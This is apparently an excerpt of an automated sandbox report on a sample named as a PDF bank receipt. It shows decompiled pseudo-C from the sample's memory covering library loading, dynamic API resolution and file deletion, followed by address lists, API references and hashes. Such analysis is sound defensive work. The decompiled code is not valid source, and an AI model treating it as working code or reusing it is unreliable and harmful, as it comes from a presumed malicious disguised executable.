											goto L75;
										case 0xf:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L73;
										case 0x10:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L65;
										case 0x11:
											_push(3);
											goto L74;
										case 0x12:
											_push(0x17);
											L101:
											_pop(__esi);
											goto L102;
										case 0x13:
											__eax = __esp + 0x24;
											__eax = E6EC91B4C(__esp + 0x24);
											_push(0xb);
											_pop(__esi);
											__ecx = __eax + 1;
											__eflags = __eax + 1 - __esi;
											_push("true");
											_pop(__ecx);
											__esi =  >=  ? __eax + 1 : __esi;
											__esi = __eax + __esi;
											__eflags = __esi;
											L80:
											__ebp =  *(__esp + 0x24);
											goto L93;
										case 0x14:
											__esi = __esi | 0xffffffff;
											goto L102;
										case 0x15:
											 *((intOrPtr*)(__esp + 0x3c)) =  *((intOrPtr*)(__esp + 0x3c)) + 1;
											_push(3);
											goto L74;
										case 0x16:
											__eax = 0;
											goto L75;
										case 0x17:
											__eax = 0;
											__eflags = 0;
											__edx = 1;
											goto L71;
										case 0x18:
											_t342 =  *(_t382 + 0x814);
											__eflags = _t342 - _t313;
											_push("true");
											_t294 =  <=  ? _t313 : _t342;
											 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0;
											 *(_t392 + 0x24) =  *(_t392 + 0x24) & 0;
											_t314 =  <=  ? _t313 : _t342;
											__eflags =  *(_t392 + 0x38) - 3;
											 *(_t392 + 0x34) =  <=  ? _t313 : _t342;
											__eflags = _t342 - (0 |  *(_t392 + 0x38) == 0x00000003);
											_pop(_t297);
											_t374 =  !=  ? _t297 :  *(_t392 + 0x30);
											 *(_t392 + 0x2c) =  !=  ? _t297 :  *(_t392 + 0x30);
											goto L129;
										case 0x19:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L58:
											_push(2);
											_pop(__ecx);
											 *(__esp + 0x18) = __ecx;
											goto L75;
										case 0x1a:
											L69:
											_push(5);
											goto L74;
										case 0x1b:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											L61:
											_push(3);
											_pop(__esi);
											 *(__esp + 0x18) = __esi;
											goto L75;
										case 0x1c:
											__eax = 0;
											__eax = 1;
											goto L75;
										case 0x1d:
											L73:
											_push(6);
											goto L74;
										case 0x1e:
											L65:
											_push(2);
											goto L74;
										case 0x1f:
											__eax = __esp + 0x24;
											__eax = E6EC91B4C(__esp + 0x24);
											__ebp =  *(__esp + 0x28);
											__esi = __eax + 1;
											L92:
											_pop(__ecx);
											L93:
											__eflags = __esi;
											if(__esi == 0) {
												goto L129;
											}
											L102:
											__ecx =  *(__esp + 0x20);
											0 = 1;
											 *((intOrPtr*)(__esp + 0x2c)) = 1;
											__eflags = __ecx;
											if(__ecx != 0) {
												__eflags = __ecx - 1;
												if(__ecx == 1) {
													__eax = __ebx;
													__eax = __ebx << 5;
													__eflags = __eax;
													 *(__eax + __edi + 0x82c) = __esi;
												}
												L109:
												 *(__esp + 0x20) = __ecx;
												goto L129;
											}
											__ebx = __ebx << 5;
											__eax =  *(__ebx + __edi + 0x830);
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L105:
												__eax = GlobalFree(__eax);
												__ecx =  *(__esp + 0x20);
												L106:
												 *(__ebx + __edi + 0x830) = __esi;
												goto L109;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L106;
											}
											goto L105;
										case 0x20:
											L71:
											_push(4);
											L74:
											_pop(__eax);
											L75:
											__ecx =  *(0x6ec94090 + __eax * 4);
											__esi = __ebx;
											__esi = __ebx << 5;
											__edx =  ~__edx;
											_push("true");
											asm("sbb edx, edx");
											 *(__esp + 0x30) = 1;
											__edx = __edx & 0x00008000;
											__edx = __edx | __eax;
											0 = 1;
											 *(__esi + __edi + 0x818) = __edx;
											__edx =  *(__esp + 0x1c);
											__eflags = __ecx;
											__eax =  >  ? __ecx : 1;
											__eflags = __edx;
											_pop(__ecx);
											__eax =  <  ? __ecx :  >  ? __ecx : 1;
											 *((intOrPtr*)(__esi + __edi + 0x828)) =  <  ? __ecx :  >  ? __ecx : 1;
											__eflags = __edx - __ecx;
											if(__edx == __ecx) {
												__eax = __esp + 0x24;
												__eax = E6EC91B4C(__esp + 0x24);
												__ebp =  *(__esp + 0x28);
												__edx = __eax + 1;
												 *(__esp + 0x18) = __edx;
											}
											 *(__esi + __edi + 0x830) =  *(__esi + __edi + 0x830) & 0x00000000;
											__ecx = __ebx + 0x41;
											__ecx = __ebx + 0x41 << 5;
											 *(__esi + __edi + 0x81c) = __edx;
											 *((__ebx + 0x41 << 5) + __edi) =  *((__ebx + 0x41 << 5) + __edi) & 0x00000000;
											 *(__esi + __edi + 0x82c) =  *(__esi + __edi + 0x82c) & 0x00000000;
											goto L129;
										case 0x21:
											goto L129;
									}
								}
								_t343 = _t341 - 1;
								__eflags = _t343;
								if(_t343 == 0) {
									_t313 = 0;
									 *(_t392 + 0x30) = 0;
									goto L49;
								}
								__eflags = _t343 != 1;
								if(_t343 != 1) {
									goto L121;
								}
								__eflags = _t241 - 0x6e;
								if(__eflags > 0) {
									_t298 = _t241 - 0x72;
									__eflags = _t298;
									if(_t298 == 0) {
										_push(4);
										L41:
										_pop(_t299);
										L42:
										_t345 =  *(_t382 + 0x810);
										__eflags =  *(_t392 + 0x18) - 1;
										if( *(_t392 + 0x18) != 1) {
											_t346 = _t345 &  !_t299;
											__eflags = _t346;
										} else {
											_t346 = _t345 | _t299;
										}
										 *(_t382 + 0x810) = _t346;
										goto L46;
									}
									_t303 = _t298 - 1;
									__eflags = _t303;
									if(_t303 == 0) {
										_push(0x10);
										goto L41;
									}
									_t347 = 2;
									__eflags = _t303 != _t347;
									if(_t303 != _t347) {
										goto L129;
									}
									_push(0x40);
									goto L41;
								}
								if(__eflags == 0) {
									_push(8);
									goto L41;
								}
								_t305 = _t241 - 0x21;
								__eflags = _t305;
								if(_t305 == 0) {
									 *(_t392 + 0x18) =  ~( *(_t392 + 0x18));
									goto L129;
								}
								_t306 = _t305 - 0x11;
								__eflags = _t306;
								if(_t306 == 0) {
									_t299 = 0x100;
									goto L42;
								}
								_t307 = _t306 - 0x31;
								__eflags = _t307;
								if(_t307 == 0) {
									_t299 = 1;
									goto L42;
								}
								_t348 = 2;
								__eflags = _t307 != _t348;
								if(_t307 != _t348) {
									goto L129;
								} else {
									_push(0x20);
									goto L41;
								}
							}
							 *(_t392 + 0x1c) =  *(_t392 + 0x1c) & 0x00000000;
							 *(_t392 + 0x34) =  *(_t392 + 0x34) & 0x00000000;
							goto L132;
						}
						__eflags =  *((char*)(_t391 - 1)) - 0x3a;
						if( *((char*)(_t391 - 1)) != 0x3a) {
							goto L29;
						}
						__eflags = _t336;
						if(_t336 == 0) {
							goto L15;
						}
						goto L29;
					}
					_t349 = _t335 - 5;
					if(_t349 == 0) {
						__eflags =  *(_t392 + 0x28);
						if( *(_t392 + 0x28) == 0) {
							 *(_t392 + 0x1c) = 1;
							__eflags =  *(_t392 + 0x34) - 3;
							_t360 = (0 |  *(_t392 + 0x34) == 0x00000003) + 1;
							__eflags = _t360;
							 *(_t392 + 0x30) = _t360;
						}
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						_t377 =  *(_t392 + 0x28);
						__eflags = _t377;
						_t351 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x2c) =  *(_t392 + 0x2c) & 0x00000000;
						__eflags = _t377;
						_t353 =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						 *(_t392 + 0x2c) =  ==  ?  *(_t392 + 0x2c) :  *(_t392 + 0x2c);
						__eflags = _t377;
						_t355 = 0 | _t377 == 0x00000000;
						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
						__eflags =  *(_t392 + 0x28);
						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
						L13:
						 *(_t392 + 0x20) = _t379;
						_t368 =  *(_t392 + 0x40);
						__eflags = _t355;
						if(_t355 != 0) {
							goto L132;
						}
						L14:
						_t336 =  *(_t392 + 0x1c);
						goto L15;
					}
					_t361 = _t349 - 1;
					if(_t361 == 0) {
						_t380 =  *(_t392 + 0x28);
						__eflags = _t380;
						_t363 =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x1c) =  ==  ?  *((void*)(_t392 + 0x48)) :  *(_t392 + 0x1c);
						 *(_t392 + 0x18) =  *(_t392 + 0x18) & 0x00000000;
						__eflags = _t380;
						_t365 =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						 *(_t392 + 0x18) =  ==  ?  *(_t392 + 0x18) :  *(_t392 + 0x18);
						__eflags = _t380;
						_t355 = 0 | _t380 == 0x00000000;
						 *(_t392 + 0x20) =  *(_t392 + 0x20) & 0x00000000;
						__eflags =  *(_t392 + 0x28);
						_t379 =  ==  ?  *(_t392 + 0x20) :  *(_t392 + 0x20);
						goto L13;
					}
					if(_t361 != 0x16) {
						goto L14;
					} else {
						 *(_t392 + 0x1c) = 3;
						 *(_t392 + 0x18) = 1;
						goto L132;
					}
				}
				GlobalFree( *(_t392 + 0x44));
				GlobalFree( *(_t392 + 0x14));
				GlobalFree( *(_t392 + 0x38)); // executed
				if(_t382 == 0 ||  *(_t382 + 0x80c) != 0) {
					L181:
					return _t382;
				} else {
					_t249 =  *_t382 - 1;
					if(_t249 == 0) {
						_t215 = _t382 + 8; // 0x8
						_t386 = _t215;
						__eflags =  *_t386;
						if( *_t386 != 0) {
							_t250 = GetModuleHandleA(_t386);
							 *(_t382 + 0x808) = _t250;
							__eflags = _t250;
							if(_t250 != 0) {
								L169:
								_t220 = _t382 + 0x408; // 0x408
								_t387 = _t220;
								_t251 = E6EC91ECE(_t250, _t387);
								 *(_t382 + 0x80c) = _t251;
								__eflags = _t251;
								if(_t251 == 0) {
									__eflags =  *_t387 - 0x23;
									if( *_t387 == 0x23) {
										_t222 = _t382 + 0x409; // 0x409
										_t255 = E6EC91326();
										__eflags = _t255;
										if(_t255 != 0) {
											__eflags = _t255 & 0xffff0000;
											if((_t255 & 0xffff0000) == 0) {
												 *(_t382 + 0x80c) = GetProcAddress( *(_t382 + 0x808), _t255 & 0x0000ffff);
											}
										}
									}
								}
								__eflags =  *(_t392 + 0x3c);
								if( *(_t392 + 0x3c) != 0) {
									L176:
									_t252 = lstrlenA(_t387);
									_t323 = 0x41;
									_t387[_t252] = _t323;
									_t253 = E6EC91ECE( *(_t382 + 0x808), _t387);
									__eflags = _t253;
									if(_t253 == 0) {
										__eflags =  *(_t382 + 0x80c);
										L179:
										if(__eflags != 0) {
											goto L181;
										}
										L180:
										_t233 = _t382 + 4;
										 *_t233 =  *(_t382 + 4) | 0xffffffff;
										__eflags =  *_t233;
										goto L181;
									}
									L177:
									 *(_t382 + 0x80c) = _t253;
									goto L181;
								} else {
									__eflags =  *(_t382 + 0x80c);
									if( *(_t382 + 0x80c) != 0) {
										goto L181;
									}
									goto L176;
								}
							}
							_t250 = LoadLibraryA(_t386);
							 *(_t382 + 0x808) = _t250;
							__eflags = _t250;
							if(_t250 == 0) {
								goto L180;
							}
							goto L169;
						}
						_t216 = _t382 + 0x408; // 0x408
						_t259 = E6EC91326();
						 *(_t382 + 0x80c) = _t259;
						__eflags = _t259;
						goto L179;
					}
					_t260 = _t249 - 1;
					if(_t260 == 0) {
						_t214 = _t382 + 0x408; // 0x408
						_t261 = _t214;
						__eflags =  *_t261;
						if( *_t261 == 0) {
							goto L181;
						}
						_push(_t261);
						_t253 = E6EC91326();
						goto L177;
					}
					if(_t260 != 1) {
						goto L181;
					}
					_t202 = _t382 + 8; // 0x8
					_t317 = _t202;
					_push(_t202);
					_t388 = E6EC91326();
					 *(_t382 + 0x808) = _t388;
					if(_t388 == 0) {
						goto L180;
					}
					 *(_t382 + 0x84c) =  *(_t382 + 0x84c) & 0x00000000;
					_t264 = E6EC912AF(_t317);
					 *(_t382 + 0x83c) =  *(_t382 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t382 + 0x850)) = _t264;
					 *((intOrPtr*)(_t382 + 0x848)) = 1;
					 *((intOrPtr*)(_t382 + 0x838)) = 1;
					_t211 = _t382 + 0x408; // 0x408
					_t253 =  *(_t388->i + E6EC91326() * 4);
					goto L177;
				}
			}

0x6ec92291
0x6ec92295
0x6ec92297
0x6ec9229b
0x6ec9229f
0x6ec922a3
0x6ec922a7
0x6ec922ab
0x6ec922af
0x6ec922b4
0x6ec922b8
0x6ec922bf
0x6ec922c3
0x6ec922c8
0x6ec922ca
0x6ec922ce
0x6ec922d0
0x6ec922d4
0x6ec922dc
0x6ec922de
0x6ec922de
0x6ec922e0
0x6ec922e6
0x00000000
0x00000000
0x6ec922f0
0x6ec922f3
0x6ec922f7
0x6ec922fc
0x6ec922ff
0x6ec927e3
0x6ec927e3
0x6ec927e3
0x6ec927e8
0x6ec927e8
0x6ec927eb
0x6ec9280c
0x6ec9280e
0x6ec92810
0x6ec92812
0x6ec92821
0x6ec92823
0x6ec92823
0x6ec92825
0x6ec9282b
0x6ec9282b
0x6ec92831
0x6ec92835
0x6ec92835
0x6ec92838
0x6ec92838
0x6ec9283e
0x6ec92840
0x6ec92842
0x6ec92844
0x6ec9284a
0x6ec92850
0x6ec92853
0x6ec92853
0x6ec92855
0x6ec9287e
0x6ec92882
0x00000000
0x00000000
0x6ec92885
0x6ec92887
0x6ec9288d
0x6ec92896
0x6ec92899
0x6ec9289b
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec9289d
0x6ec9289d
0x6ec9289d
0x6ec928a3
0x6ec928a5
0x00000000
0x00000000
0x6ec928a7
0x6ec928a9
0x6ec928a9
0x6ec928ad
0x6ec928af
0x6ec928b1
0x6ec928b1
0x6ec928b1
0x6ec928b1
0x6ec928b8
0x6ec928be
0x6ec928c0
0x6ec928d6
0x6ec928d7
0x6ec928d7
0x6ec928d9
0x6ec928c2
0x6ec928c8
0x6ec928cb
0x6ec928cb
0x00000000
0x6ec92857
0x6ec92857
0x6ec92857
0x6ec9285a
0x6ec92866
0x6ec9286b
0x6ec92871
0x6ec92876
0x6ec928df
0x6ec928df
0x6ec928e3
0x6ec928e3
0x6ec928e7
0x6ec928e8
0x6ec928ec
0x6ec928f1
0x00000000
0x00000000
0x00000000
0x6ec928f1
0x6ec9285c
0x6ec9285c
0x6ec9285f
0x00000000
0x00000000
0x6ec92861
0x6ec92864
0x00000000
0x00000000
0x00000000
0x6ec92864
0x6ec92855
0x6ec927ed
0x6ec927f0
0x6ec927f6
0x6ec927fe
0x6ec92800
0x6ec92800
0x6ec92801
0x6ec92801
0x00000000
0x6ec927f0
0x6ec92305
0x6ec92308
0x6ec92438
0x6ec9243c
0x6ec92440
0x6ec9244c
0x6ec9244c
0x6ec92451
0x6ec923ef
0x6ec923ef
0x6ec923ef
0x6ec923f2
0x6ec92746
0x6ec9275e
0x6ec9275e
0x6ec92760
0x00000000
0x00000000
0x6ec9274c
0x6ec9274d
0x6ec92752
0x6ec92754
0x6ec9278a
0x6ec9278b
0x6ec9278f
0x6ec92792
0x6ec92794
0x00000000
0x6ec92794
0x6ec92756
0x6ec92756
0x6ec92756
0x6ec9275b
0x6ec9275b
0x6ec92762
0x6ec92764
0x6ec927d3
0x6ec927d4
0x6ec927d8
0x6ec927d8
0x6ec927dc
0x6ec927dc
0x00000000
0x6ec927dc
0x6ec92766
0x6ec92768
0x6ec9276e
0x6ec9276e
0x6ec92771
0x6ec92774
0x6ec9279a
0x6ec9279a
0x6ec9279d
0x6ec927a0
0x00000000
0x00000000
0x6ec927a2
0x6ec927a5
0x00000000
0x00000000
0x6ec927a9
0x6ec927aa
0x6ec927ae
0x6ec927ae
0x6ec927b2
0x6ec927b4
0x6ec927b6
0x6ec927cc
0x6ec927b8
0x6ec927bd
0x6ec927c0
0x6ec927c0
0x00000000
0x6ec927b6
0x6ec92776
0x6ec92779
0x6ec9277c
0x00000000
0x00000000
0x6ec9277e
0x00000000
0x6ec9277e
0x6ec9276a
0x6ec9276c
0x00000000
0x00000000
0x00000000
0x6ec9276c
0x6ec923f8
0x6ec923f8
0x6ec923fb
0x6ec924cc
0x6ec924d0
0x6ec924d0
0x6ec924d5
0x6ec924d8
0x00000000
0x00000000
0x6ec924de
0x6ec924e5
0x00000000
0x6ec9269f
0x6ec926a3
0x6ec926a5
0x6ec926a9
0x6ec926a9
0x6ec926aa
0x6ec926ad
0x6ec926af
0x00000000
0x00000000
0x6ec926b1
0x6ec926b1
0x6ec926b4
0x6ec926c7
0x6ec926c8
0x6ec926d0
0x00000000
0x6ec926d0
0x6ec926b6
0x6ec926b6
0x6ec926b8
0x00000000
0x00000000
0x6ec926ba
0x6ec926bc
0x6ec926be
0x6ec926be
0x6ec926be
0x6ec926bf
0x6ec926c2
0x6ec926c4
0x6ec926a9
0x6ec926aa
0x6ec926ad
0x6ec926af
0x00000000
0x00000000
0x00000000
0x6ec926af
0x00000000
0x6ec924b8
0x6ec924bb
0x00000000
0x00000000
0x6ec9253f
0x00000000
0x00000000
0x6ec92526
0x6ec9252a
0x6ec9252c
0x6ec92530
0x6ec92531
0x6ec92532
0x6ec92536
0x00000000
0x00000000
0x6ec92671
0x6ec92675
0x00000000
0x00000000
0x6ec9267c
0x6ec92685
0x6ec92687
0x6ec9268b
0x6ec9268d
0x6ec92693
0x6ec92694
0x6ec92695
0x6ec9269a
0x00000000
0x00000000
0x6ec92634
0x00000000
0x00000000
0x6ec92549
0x00000000
0x00000000
0x6ec926f2
0x00000000
0x00000000
0x6ec92551
0x6ec92553
0x6ec92554
0x00000000
0x00000000
0x6ec926e2
0x00000000
0x00000000
0x6ec926e6
0x00000000
0x00000000
0x6ec926ee
0x00000000
0x00000000
0x6ec92598
0x6ec92598
0x6ec9259a
0x00000000
0x00000000
0x6ec92564
0x6ec92566
0x6ec92567
0x00000000
0x00000000
0x6ec92577
0x6ec92579
0x6ec9257a
0x00000000
0x00000000
0x6ec925aa
0x6ec925aa
0x6ec925ac
0x00000000
0x00000000
0x6ec92583
0x6ec92583
0x6ec92585
0x00000000
0x00000000
0x6ec9258c
0x00000000
0x00000000
0x6ec926ea
0x6ec926f4
0x6ec926f4
0x00000000
0x00000000
0x6ec9263d
0x6ec92642
0x6ec92648
0x6ec9264a
0x6ec9264b
0x6ec9264e
0x6ec92650
0x6ec92652
0x6ec92653
0x6ec92656
0x6ec92656
0x6ec92658
0x6ec92658
0x00000000
0x00000000
0x6ec926dd
0x00000000
0x00000000
0x6ec92590
0x6ec92594
0x00000000
0x00000000
0x6ec9254d
0x00000000
0x00000000
0x6ec925a1
0x6ec925a1
0x6ec925a3
0x00000000
0x00000000
0x6ec924ec
0x6ec924f4
0x6ec924f6
0x6ec924f8
0x6ec924fb
0x6ec924ff
0x6ec92503
0x6ec9250b
0x6ec92510
0x6ec92517
0x6ec92519
0x6ec9251a
0x6ec9251d
0x00000000
0x00000000
0x6ec92558
0x6ec9255a
0x6ec9255a
0x6ec9255b
0x6ec9255b
0x6ec9255d
0x6ec9255e
0x00000000
0x00000000
0x6ec9259d
0x6ec9259d
0x00000000
0x00000000
0x6ec9256b
0x6ec9256d
0x6ec9256d
0x6ec9256e
0x6ec9256e
0x6ec92570
0x6ec92571
0x00000000
0x00000000
0x6ec9257e
0x6ec92580
0x00000000
0x00000000
0x6ec925af
0x6ec925af
0x00000000
0x00000000
0x6ec92588
0x6ec92588
0x00000000
0x00000000
0x6ec9265e
0x6ec92663
0x6ec92668
0x6ec9266c
0x6ec926d2
0x6ec926d2
0x6ec926d3
0x6ec926d3
0x6ec926d5
0x00000000
0x00000000
0x6ec926f5
0x6ec926f5
0x6ec926fb
0x6ec926fc
0x6ec92700
0x6ec92702
0x6ec9272c
0x6ec9272e
0x6ec92730
0x6ec92732
0x6ec92732
0x6ec92735
0x6ec92735
0x6ec9273c
0x6ec9273d
0x00000000
0x6ec9273d
0x6ec92704
0x6ec92707
0x6ec9270e
0x6ec92711
0x6ec92718
0x6ec92719
0x6ec9271f
0x6ec92723
0x6ec92723
0x00000000
0x6ec92723
0x6ec92713
0x6ec92716
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec925a6
0x6ec925a6
0x6ec925b1
0x6ec925b1
0x6ec925b2
0x6ec925b2
0x6ec925b9
0x6ec925bb
0x6ec925be
0x6ec925c0
0x6ec925c2
0x6ec925c4
0x6ec925cc
0x6ec925d2
0x6ec925d6
0x6ec925d7
0x6ec925de
0x6ec925e2
0x6ec925e4
0x6ec925e7
0x6ec925e9
0x6ec925ea
0x6ec925ed
0x6ec925f4
0x6ec925f6
0x6ec925f8
0x6ec925fd
0x6ec92602
0x6ec92607
0x6ec9260a
0x6ec9260a
0x6ec9260e
0x6ec92616
0x6ec92619
0x6ec9261c
0x6ec92623
0x6ec92627
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec924e5
0x6ec92401
0x6ec92401
0x6ec92404
0x6ec924c4
0x6ec924c6
0x00000000
0x6ec924c6
0x6ec9240a
0x6ec9240d
0x00000000
0x00000000
0x6ec92413
0x6ec92416
0x6ec9247b
0x6ec9247b
0x6ec9247e
0x6ec92498
0x6ec9249a
0x6ec9249a
0x6ec9249b
0x6ec9249b
0x6ec924a4
0x6ec924a8
0x6ec924b0
0x6ec924b0
0x6ec924aa
0x6ec924aa
0x6ec924aa
0x6ec924b2
0x00000000
0x6ec924b2
0x6ec92480
0x6ec92480
0x6ec92483
0x6ec92494
0x00000000
0x6ec92494
0x6ec92487
0x6ec92488
0x6ec9248a
0x00000000
0x00000000
0x6ec92490
0x00000000
0x6ec92490
0x6ec92418
0x6ec92477
0x00000000
0x6ec92477
0x6ec9241a
0x6ec9241a
0x6ec9241d
0x6ec9246e
0x00000000
0x6ec9246e
0x6ec9241f
0x6ec9241f
0x6ec92422
0x6ec92467
0x00000000
0x6ec92467
0x6ec92424
0x6ec92424
0x6ec92427
0x6ec92464
0x00000000
0x6ec92464
0x6ec9242b
0x6ec9242c
0x6ec9242e
0x00000000
0x6ec92434
0x6ec92434
0x00000000
0x6ec92434
0x6ec9242e
0x6ec92453
0x6ec92458
0x00000000
0x6ec92458
0x6ec92442
0x6ec92446
0x00000000
0x00000000
0x6ec92448
0x6ec9244a
0x00000000
0x00000000
0x00000000
0x6ec9244a
0x6ec9230e
0x6ec92311
0x6ec92378
0x6ec9237d
0x6ec92382
0x6ec92388
0x6ec92390
0x6ec92390
0x6ec92391
0x6ec92391
0x6ec92399
0x6ec9239e
0x6ec923a2
0x6ec923a4
0x6ec923a9
0x6ec923b1
0x6ec923b6
0x6ec923b8
0x6ec923bd
0x6ec923c3
0x6ec923c9
0x6ec923cc
0x6ec923d1
0x6ec923d6
0x6ec923db
0x6ec923db
0x6ec923df
0x6ec923e3
0x6ec923e5
0x00000000
0x00000000
0x6ec923eb
0x6ec923eb
0x00000000
0x6ec923eb
0x6ec92313
0x6ec92316
0x6ec92335
0x6ec92339
0x6ec9233f
0x6ec92344
0x6ec9234c
0x6ec92351
0x6ec92353
0x6ec92358
0x6ec9235e
0x6ec92364
0x6ec92367
0x6ec9236c
0x6ec92371
0x00000000
0x6ec92371
0x6ec9231b
0x00000000
0x6ec92321
0x6ec92323
0x6ec9232c
0x00000000
0x6ec9232c
0x6ec9231b
0x6ec92901
0x6ec92907
0x6ec9290d
0x6ec92911
0x6ec92a8a
0x6ec92a93
0x6ec92925
0x6ec92927
0x6ec9292a
0x6ec929b5
0x6ec929b5
0x6ec929b8
0x6ec929ba
0x6ec929d7
0x6ec929dd
0x6ec929e3
0x6ec929e5
0x6ec929fc
0x6ec929fc
0x6ec929fc
0x6ec92a04
0x6ec92a09
0x6ec92a11
0x6ec92a13
0x6ec92a15
0x6ec92a18
0x6ec92a1a
0x6ec92a21
0x6ec92a27
0x6ec92a29
0x6ec92a2b
0x6ec92a30
0x6ec92a42
0x6ec92a42
0x6ec92a30
0x6ec92a29
0x6ec92a18
0x6ec92a48
0x6ec92a4c
0x6ec92a56
0x6ec92a57
0x6ec92a5f
0x6ec92a61
0x6ec92a6b
0x6ec92a72
0x6ec92a74
0x6ec92a7e
0x6ec92a84
0x6ec92a84
0x00000000
0x00000000
0x6ec92a86
0x6ec92a86
0x6ec92a86
0x6ec92a86
0x00000000
0x6ec92a86
0x6ec92a76
0x6ec92a76
0x00000000
0x6ec92a4e
0x6ec92a4e
0x6ec92a54
0x00000000
0x00000000
0x00000000
0x6ec92a54
0x6ec92a4c
0x6ec929e8
0x6ec929ee
0x6ec929f4
0x6ec929f6
0x00000000
0x00000000
0x00000000
0x6ec929f6
0x6ec929bc
0x6ec929c3
0x6ec929c9
0x6ec929cf
0x00000000
0x6ec929cf
0x6ec92930
0x6ec92933
0x6ec9299b
0x6ec9299b
0x6ec929a1
0x6ec929a3
0x00000000
0x00000000
0x6ec929a9
0x6ec929aa
0x00000000
0x6ec929af
0x6ec92938
0x00000000
0x00000000
0x6ec9293e
0x6ec9293e
0x6ec92941
0x6ec92947
0x6ec92949
0x6ec92952
0x00000000
0x00000000
0x6ec92958
0x6ec92960
0x6ec92965
0x6ec9296c
0x6ec92975
0x6ec9297b
0x6ec92981
0x6ec92994
0x00000000
0x6ec92994

APIs

Part of subcall function 6EC912C6: GlobalAlloc.KERNELBASE(00000040,6EC911C4,-000000A0), ref: 6EC912CE

lstrcpyA.KERNEL32(?,?), ref: 6EC927C0
GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6EC9281B
lstrcpyA.KERNEL32(00000008,?), ref: 6EC9286B
lstrcpyA.KERNEL32(00000408,?), ref: 6EC92876
GlobalFree.KERNEL32(00000000), ref: 6EC92887
GlobalFree.KERNEL32(?), ref: 6EC92901
GlobalFree.KERNEL32(?), ref: 6EC92907
GlobalFree.KERNELBASE(?), ref: 6EC9290D
GetModuleHandleA.KERNEL32(00000008), ref: 6EC929D7
LoadLibraryA.KERNEL32(00000008), ref: 6EC929E8
GetProcAddress.KERNEL32(?,?), ref: 6EC92A3C
lstrlenA.KERNEL32(00000408), ref: 6EC92A57

Strings

:, xrefs: 6EC92442

Memory Dump Source

Source File: 00000000.00000002.3357909179.000000006EC91000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EC90000, based on PE: true

Associated: 00000000.00000002.3357866144.000000006EC90000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3357973966.000000006EC94000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.3358014204.000000006EC96000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ec90000_E-DEKONT_pdf.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID: :
API String ID: 245916457-336475711
Opcode ID: 88577cece78c3a858cd75e93768e66a432eec4e223a2f812932c32b7bf193a83
Instruction ID: dd56626dd6257700e4cf1736b9edfc1c6dbf5c2bb68cb133f5a4a65717883bb2
Opcode Fuzzy Hash: 88577cece78c3a858cd75e93768e66a432eec4e223a2f812932c32b7bf193a83
Instruction Fuzzy Hash: 3032C4716487029FD74CCEBAE4A075ABBE4BF85314F008A2DE4E5D7298FB30D545AB81

Uniqueness

Uniqueness Score: -1.00%

Function 004059F6 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E004059F6(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CB4(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x7c5fe8 =  *0x7c5fe8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406234(0x7b8d70, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C0D(_t73);
					} else {
						lstrcatA(0x7b8d70, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x7b8d70,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BF1( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406234(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
